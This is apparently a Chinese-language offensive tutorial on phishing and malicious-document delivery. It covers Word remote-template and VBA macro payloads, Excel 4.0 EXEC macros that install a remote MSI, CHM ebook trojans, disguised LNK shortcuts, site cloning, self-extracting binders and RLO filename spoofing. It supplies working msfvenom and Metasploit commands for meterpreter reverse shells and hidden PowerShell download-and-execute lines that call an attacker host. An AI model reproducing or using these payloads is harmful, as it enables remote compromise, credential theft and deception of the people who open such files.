# 宏
宏是office自带的一种高级脚本特性,通过VBA代码,可以在office中去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中一些任务自动化
# 宏病毒
宏病毒是一种寄存在文档或模板的宏中的计算机病毒,打开这中文档,其中的宏就会被执行,宏病毒被激活,转移到计算机上
# word远程模板执行宏
利用word文档加载附加模板是的缺陷所发起的恶意请求而达到的攻击目的,所以当目标用户点开攻击者发给他的恶意word文档就可以通过向远程服务器发送恶意请求的方式,然后加载模板执行恶意模板的宏
# 攻击方法
1,创建两个不同的文件,第一个是启用宏的模板,或是.dotm文件,他将包含恶意VBA宏。
2,创建第一个文件,不包含恶意代码,但是有指向恶意模板文件的目标链接,即指向创建的第一个文件的链接
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.110.131 LPORT=4444 -e x86/shikata-ga_nai -i 10 -f vba-exe //会生成两端代码,macro的写在宏代码中 payload的写在word文档中
创建word(.docm后缀的文件)-点击工具-宏编辑器
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.110.131
set LPORT 4444
run
打开docm文件,并且启用宏s
之后会弹出meterfer的shell
当把恶意的宏代码嵌入excel中,用户打开excel文件里的宏就会被触发
#攻击方法
1,使用msf生成hack.msi放到远程的服务器上
2,使用excel插入宏
3,将插入的宏隐藏
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.110.131 LPORT=4444 -f msi -o hack.msi
=EXEC("msiexec /q /i http://192.168.110.131:8000/hack.msi") //调用执行服务器上的dayu.msi文件
=HALT() //标识Excel 4.0宏结束,类似C语言return指令
//http://192.168.110.131:8000/hack.msi可以在vps中使用python -m http.server搭建一个网站
# CHM 已编译的帮助文件
html文件格式被压缩和重整以后,就被制成了这种二进制的。chm扩展文件格式。
.chm文件格式由压缩的html文件、图像、javascript这些文件组合而成,同时,他可能还带有超链接目录、索引以及全文检索功能。
# 电子书木马钓鱼优点
1.因为电子书一般是在本地电脑域打开的,所以获得的权限也是本地电脑域的权限
2。由于木马镶嵌再电子书中,所以一般的杀毒软件无法对其中存在的木马病毒进行检查和清除
# 攻击方法
1,编写恶意代码,制作钓鱼文件(可使用MyJSRat工具)
2,将恶意代码放在服务器上并且监听
3,制作带恶意代码的chm电子书(可使用Easy CHM)
# lnk文件
用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常他以快捷方式放在硬盘上,方便使用者快速的调用
# 攻击方法
1,使用cs进行web投递生成a脚本http://192.168.110.131:80/a
2.在桌面右键创建快捷方式
目标填写payload(例如:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http://192.168.110.131:80/a')"
cs生成payload:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.110.131:80/a'))"
3.为了让快捷方式伪装的像诱导文件,可以选择更改图标,并且更改文件名
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http://192.168.110.131:80/a')"
cs生成的payload为
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.110.131:80/a'))"
填写的payload最好知名powershell的存在位置
克隆网站主要模仿相关网页的页面格式,与原网站类似,且域名相差不大,看到类似的网站一般情况下都会输入账号和密码,同时诱导受害人下载恶意文件,也可以劫持网页,记录键盘输入等操作
# 攻击方法
利用cs克隆网站
# 说明
有些网站可以克隆成功,但是不能得到用户输入的数据
使用winrar将可执行文件和图片捆绑在一起并添加到压缩文件,创建自解压格式并设置解压后运行,在模式中选择隐藏
运行执行文件会弹出图片
查看cs上线成功
ets%2Fimage-20240821111536856.png&pos_id=img-wKkexOJ9-1724221495137)
1.右键.exe文件重命名
2,重命名时再右键插入RLO
4,想要什么后缀,就将后缀名倒着写即可,例如word就是drow,png就是gnp